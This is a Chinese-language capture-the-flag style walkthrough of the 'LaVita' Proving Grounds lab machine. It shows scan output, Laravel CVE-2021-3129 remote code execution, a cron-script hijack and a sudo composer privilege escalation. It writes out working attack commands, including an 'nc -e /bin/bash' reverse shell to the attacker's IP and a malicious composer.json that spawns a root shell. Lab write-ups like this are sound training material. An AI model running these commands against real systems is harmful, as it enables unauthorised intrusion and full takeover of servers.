首页 > 其他分享 >LaVita pg walkthrough Intermediate

LaVita pg walkthrough Intermediate

时间:2024-12-01 10:54:20浏览次数:3  
标签:00 23 279B Y% 192.168 LaVita Intermediate 403 pg

nmap
└─# nmap -p- -A 192.168.159.38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 00:21 UTC
Nmap scan report for 192.168.159.38
Host is up (0.071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/1%OT=22%CT=1%CU=38927%PV=Y%DS=4%DC=T%G=Y%TM=674B
OS:AC78%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=FF%G
OS:CD=1%ISR=10D%TI=Z%CI=Z%TS=A)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M578
OS:ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT      ADDRESS
1   74.12 ms 192.168.45.1
2   73.75 ms 192.168.45.254
3   74.19 ms 192.168.251.1
4   74.23 ms 192.168.159.38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.57 seconds

显而易见了突破口只有80端口了

dirsearch
[00:23:12] Starting: 
[00:23:14] 301 -  313B  - /js  ->  http://192.168.159.38/js/
[00:23:18] 403 -  279B  - /.ht_wsr.txt                                      
[00:23:18] 403 -  279B  - /.htaccessBAK                                     
[00:23:18] 403 -  279B  - /.htaccess.bak1                                   
[00:23:18] 403 -  279B  - /.htaccess.orig                                   
[00:23:18] 403 -  279B  - /.html
[00:23:18] 403 -  279B  - /.htpasswd_test                                   
[00:23:18] 403 -  279B  - /.htaccess.save
[00:23:18] 403 -  279B  - /.htpasswds                                       
[00:23:18] 403 -  279B  - /.httr-oauth
[00:23:18] 403 -  279B  - /.htaccess.sample                                 
[00:23:19] 403 -  279B  - /.htaccess_sc                                     
[00:23:19] 403 -  279B  - /.htaccess_extra
[00:23:19] 403 -  279B  - /.htaccess_orig
[00:23:19] 403 -  279B  - /.htaccessOLD
[00:23:19] 403 -  279B  - /.htaccessOLD2                                    
[00:23:19] 403 -  279B  - /.htm
[00:23:20] 403 -  279B  - /.php                                             
[00:23:25] 405 -  835B  - /_ignition/execute-solution                       
[00:23:48] 301 -  314B  - /css  ->  http://192.168.159.38/css/              
[00:23:53] 200 -    0B  - /favicon.ico                                      
[00:23:57] 302 -  354B  - /home  ->  http://192.168.159.38/login            
[00:23:57] 403 -  279B  - /images/                                          
[00:23:58] 301 -  317B  - /images  ->  http://192.168.159.38/images/        
[00:23:59] 404 -  276B  - /javascript/editors/fckeditor                     
[00:23:59] 301 -  321B  - /javascript  ->  http://192.168.159.38/javascript/
[00:23:59] 404 -  276B  - /javascript/tiny_mce                              
[00:24:00] 403 -  279B  - /js/                                              
[00:24:03] 200 -    5KB - /login                                            
[00:24:03] 405 -  835B  - /logout                                           
[00:24:16] 200 -    5KB - /register                                         
[00:24:17] 200 -   24B  - /robots.txt                                       
[00:24:19] 403 -  279B  - /server-status                                    
[00:24:19] 403 -  279B  - /server-status/                                   
[00:24:32] 200 -    1KB - /web.config 

尝试访问不存在的路径 报错给出cms 和版本号
image

一开始以为是文件上传漏洞
image
但发现不太对 咋传都传不上去

于是根据版本搜exp
发现还真有
https://github.com/joshuavanderpoll/CVE-2021-3129
尝试执行whoami 发现成功!
python CVE-2021-3129.py --chain 'laravel/rce2' --host http://192.168.159.38/ --exec 'whoami'
image

直接来个反弹shell吧
python CVE-2021-3129.py --chain 'laravel/rce2' --host http://192.168.159.38/ --exec 'nc -e /bin/bash 192.168.45.250 80'

成功!nice

在linpeas脚本的帮助下找到了数据库密码和用户
image
然而进入数据库发现并没有啥可利用的东西
image
image

pspy64查看定时任务发现uid为1001 的用户会按时执行artisan的脚本 而且这个脚本的所有者是www-data也就是我们
image
发现uid的用户是skunk
image

重写这个文件并写入反弹shell代码
image
等待该定时任务执行
image
反弹shell成功

sudo -l 查看可提权的命令
image
查exp
image
这里我们得稍微改动一下 我们的 --working-dir必须是指定/var/www/html/lavita的
而这个目录skunk用户 是没有写入权限的 但是正好www-data 有
所以我们得先回到www-data 用户
执行这个命令
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > /var/www/html/lavita/composer.json
image
然后再回到skunk用户 执行
image

sudo composer --working-dir=/var/www/html/lavita run-script x

提权成功

image

标签:00,23,279B,Y%,192.168,LaVita,Intermediate,403,pg
From: https://www.cnblogs.com/wssw/p/18579620

相关文章

  • FPGA(现场可编程门阵列)详解-ChatGPT4o作答
    FPGA(现场可编程门阵列)详解FPGA(Field-ProgrammableGateArray)是一种可编程的集成电路,其核心特性是通过硬件编程实现数字电路功能。它在设计灵活性、性能和并行处理能力方面有显著优势,是现代电子工程领域的重要技术之一。以下是对FPGA的全面详细介绍。1.什么是FPGA?FPGA......
  • Python深度强化学习智能体DDPG自适应股票交易策略优化道琼斯30股票数据可视化研究
    全文链接:https://tecdat.cn/?p=38380原文出处:拓端数据部落公众号股票交易策略在投资公司中起着至关重要的作用。然而,在复杂多变的股票市场中获取最优策略颇具挑战。本文探索深度强化学习在优化股票交易策略以实现投资回报最大化方面的潜力。选取30只股票作为交易标的,其每日价......
  • 德普微一级代理 DP050N15BGN2 DP050N15PGN2 TO263/TO220 DPMOS N-MOSFET 150V148A 4.5
    ......
  • 嵌入式硬件实战提升篇(二)PCB高速板设计 FPGA核心板带DDR3 PCB设计DDR全面解析
    引言:设计一款高速板,供读者学习,FPGA核心板,带一颗DDR3内存,FPGA型号:XC6SLX16-2FTG256C。随着嵌入式硬件技术的快速发展,高速板设计逐渐成为嵌入式系统设计中的核心技术之一。高速板的设计要求技术人员具备信号完整性、电源完整性及高频布线的综合能力,特别是在FPGA与高速存储器(如DD......
  • ChatRoom pg walkthrough Intermediate
    NMAP┌──(root㉿kali)-[~/lab]└─#nmap-p--A192.168.189.110StartingNmap7.94SVN(https://nmap.org)at2024-11-3000:22UTCNmapscanreportfor192.168.189.110Hostisup(0.073slatency).Notshown:65533filteredtcpports(no-response)PORTST......
  • Navicat-navicat15连接PG15数据库报错“字段“datlastsysoid“不存在LINE 1: SELECT D
    报错信息:错误:字段“datlastsysoid“不存在LINE1:SELECTDISTINCTdatlastsysoidFROMpgdatabase根因:Postgres15从pg_database表中删除了datlastsysoid字段引发此错误。解决方案:修改libcc.dll文件1、用在线工具hexed.it打开libcc.dll文件地址:https://hexed.it/如......
  • 基于FPGA的4ASK调制解调系统,包含testbench,高斯信道模块,误码率统计模块,可以设置不
    1.算法仿真效果        vivado2019.2仿真结果如下: 设置SNR=20db   设置SNR=15db   设置SNR=10db   2.算法涉及理论知识概要       在现代通信系统中,数字调制技术被广泛应用于无线通信、卫星通信以及有线通信等领域。其中,振幅键控(Ampl......
  • FPGA千兆网口学习
      学习FPGA过程中~,有挺多不会的地方,有指正的我一定耐心接受。我跟着小梅哥课程视频学的。 不论是再MCU还是FPGA中都涉及有以太网项目,以前学单片机以太网的时候是用的W5500的以太网模块,网上有挺多开源项目,加上商家给的例程结合结合,改一改就可以完成单片机的以太网项目,那时......
  • FPGA基础知识学习
     记录一下看《设计与验证VerilogHDL》的知识学习,我属于突然开始学,且得边学边用,所以基础知识并不会太多,大部分项目还是得靠找别人的代码去修改,所以开始看这本书进行基础知识学习,看到这本书是看野火的教程中推荐的书籍,所以买来看看verilg的基础语法一类。连续赋值语句assign......
  • 1分钟学会如何提升PCIe通信速率,基于RK3568J + FPGA国产平台!
    测试数据汇总表1 PCIe总线介绍PCIe,即PCI-Express(peripheralcomponentinterconnectexpress)是一种高速串行计算机扩展总线标准。主要用于扩充计算机系统总线数据吞吐量以及提高设备通信速度。图1 DMA技术介绍DMA(DirectMemoryAccess,直接内存访问)是一种让硬件外......